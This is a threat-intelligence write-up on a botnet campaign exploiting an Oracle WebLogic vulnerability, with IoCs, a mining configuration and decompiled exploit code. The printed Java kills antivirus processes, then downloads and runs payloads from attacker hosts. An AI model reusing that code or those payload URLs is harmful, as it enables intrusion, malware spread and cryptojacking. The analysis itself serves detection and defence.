Malicious Campaign luoxk Is Actively Exploiting CVE-2018-2893

Author: Zhang Zaifeng, yegenshen, RootKiter, JiaYu

On July 18, in an officially released routine patch update, Oracle fixed CVE-2018-2893, an Oracle WebLogic Server remote code execution vulnerability.

Three days later, at 2018-07-21 11:24:31 GMT+8, we noticed that a malicious campaign that we have been tracking for a long time start to exploit this vulnerability to spread itself. This campaign has been using luoxkexp[.]com as main C2, and we named it luoxk.

The luoxk group registered the luoxkexp[.]com C2 domain on March 16,2017, and then immediately started to use it. Our DNSmon system was able to pick up this C2 domain the second day and marked it as abnormal.

Since then, we have witnessed various activities of this group, such as:

  • using DSL(Nitol) code to perform ddos attack
  • using Gh0st to execute RAT
  • performing mining by using XMRig, and the wallet address is 48WDQHCe5aRDeHv1DkkdwQiPRQSqYw2DqEic7MZ47iJVVTeQ1aknDULfKj6qqLu6hy6xRZJu4BgYziSMbfzCGnqc54VekKH
  • Android malicious APK
  • Exploiting RMI service in a worm style

The earliest DDoS attack we captured in our Botnet Tracking System from this campaign went back to 2017-06-11 and the victim was 116.211.167.112.

2017-06-11 22:39:29     dsl4            luoxkexp.com                    192.225.225.154 2015    ddos        tcp_flood       116.211.167.112                 15010       tcp_flood, target=116.211.167.112, port=15010, attack_time=20m, threads=30, type=22  

CVE-2018-2893 Exploit

On the 21st, the luoxk group started to target CVE-2018-2893, which was only released for 3 days. The main exploit file is this

hxxp://103.99.115.220:8080/JexRemoteTools.jar      #md5 hash 2f7df3baefb1cdcd7e7de38cc964c9dc  

By decompile the jar package, we would see the following key code.

public JexReverse(String paramString, int paramInt) throws Exception  
 {
   Properties localProperties = System.getProperties();
   String str = localProperties.getProperty("os.name");
   try
   {
     if (str.contains("Win"))
     {
       execw("taskkill /f /im 360Safe.exe");
       execw("taskkill /f /im 360tray.exe");
       downloadFile("hxxp://121.18.238.56:8080/aaa.exe", "59081.exe");


       execw("cmd /c 59081.exe");
       exec("59081.exe");
       throw new Exception("8888: windows执行下载者命令");  #windows execute downloader commands
     }
     downloadFile("hxxp://121.18.238.56:8080/testshell.sh", "gen.sh");
     execw("chmod 777 gen.sh");
     exec("/bin/sh gen.sh");

   }
   catch (Exception localException)
   {

     if (localException.toString().indexOf("8888") > -1) {
       throw localException;
     }
     throw new Exception("8888:" + new String(localException.toString()) + "\r\n");
   }
 }

And then download the following files

hxxp://121.18.238.56:8080/aaa.exe           #to download xmrig  
hxxp://121.18.238.56:8080/testshell.sh      #to download SYN_145, SYN_7008, a4.sh, a5.sh  
hxxp://121.18.238.56:8080/SYN_145           #BillGates ddos malware, C2=121.18.238.56:145  
hxxp://121.18.238.56:8080/a4.sh             #kill process using higher than 10% CPU  
hxxp://121.18.238.56:8080/SYN_7008          #BillGates ddos malware,  C2=121.18.238.56:7008  
hxxp://121.18.238.56:8080/a5.sh             #kill process using higher than 10% CPU, download and run xmrig  
hxxp://121.18.238.56/xmrig                  #xmrig, downloaded and ran by the above a5.sh  
hxxp://luoxkexp.com:8099/ver1.txt           #xmrig configureation, detailed as follows  

The mining configuration is from the above ver1.txt, as follows:

ver=1.5;  
pool=pool.minexmr.com;  
port=5555;  
user=48WDQHCe5aRDeHv1DkkdwQiPRQSqYw2DqEic7MZ47iJVVTeQ1aknDULfKj6qqLu6hy6xRZJu4BgYziSMbfzCGnqc54VekKH+15000;  
pass=x;  
algo=cryptonight;  
durl=http://121.18.238.56:8080/aaa.exe;  

C2 Access Trend

The dns access traffic for luoxkexp[.]com has been going up for the last few days, and reached a peak at above 300k/d

Contact Us

Feel free to follow us on our blog, twitter or Wechat 360Netlab.

IoC

IoC

Domain and IP

121.18.238.56   AS4837 CHINA UNICOM China169 Backbone  
103.99.115.220  AS21859 Zenlayer Inc  
luoxkexp.com  
xmr.luoxkexp.com  
www.luoxkexp.com  
v7.luoxkexp.com  
luoxk.f3322.net   #share same ip, domain keyword, and dns start time  

Malware Sample MD5

ff03c749b49d7dacdf50ded3c4030e61  
f34ec3ff56918c13f454472587868393  
e1df71c38cea61397e713d6e580e9051  
a8538f6d35362481749d1fd338b6b17d  

URL

http://xmr.luoxkexp.com:8888/xmrig  
http://xmr.luoxkexp.com:8888/xmr64.exe  
http://xmr.luoxkexp.com:8888/version.txt  
http://xmr.luoxkexp.com:8888/jjj.exe  
http://xmr.luoxkexp.com:8888/7799  
http://xmr.luoxkexp.com:8888/2.exe  
http://xmr.luoxkexp.com:8888/1.sh  
http://xmr.luoxkexp.com:8888/1.exe  
http://xmr.luoxkexp.com/  
http://xmr.luoxkexp.com/1.exe  
hxxp://103.99.115.220:8080/JexRemoteTools.jar  
hxxp://121.18.238.56:8080/aaa.exe  
hxxp://121.18.238.56:8080/testshell.sh  
hxxp://121.18.238.56:8080/SYN_145  
hxxp://121.18.238.56:8080/a4.sh  
hxxp://121.18.238.56:8080/SYN_7008  
hxxp://121.18.238.56:8080/a5.sh  
hxxp://121.18.238.56/xmrig  
hxxp://luoxkexp.com:8099/ver1.txt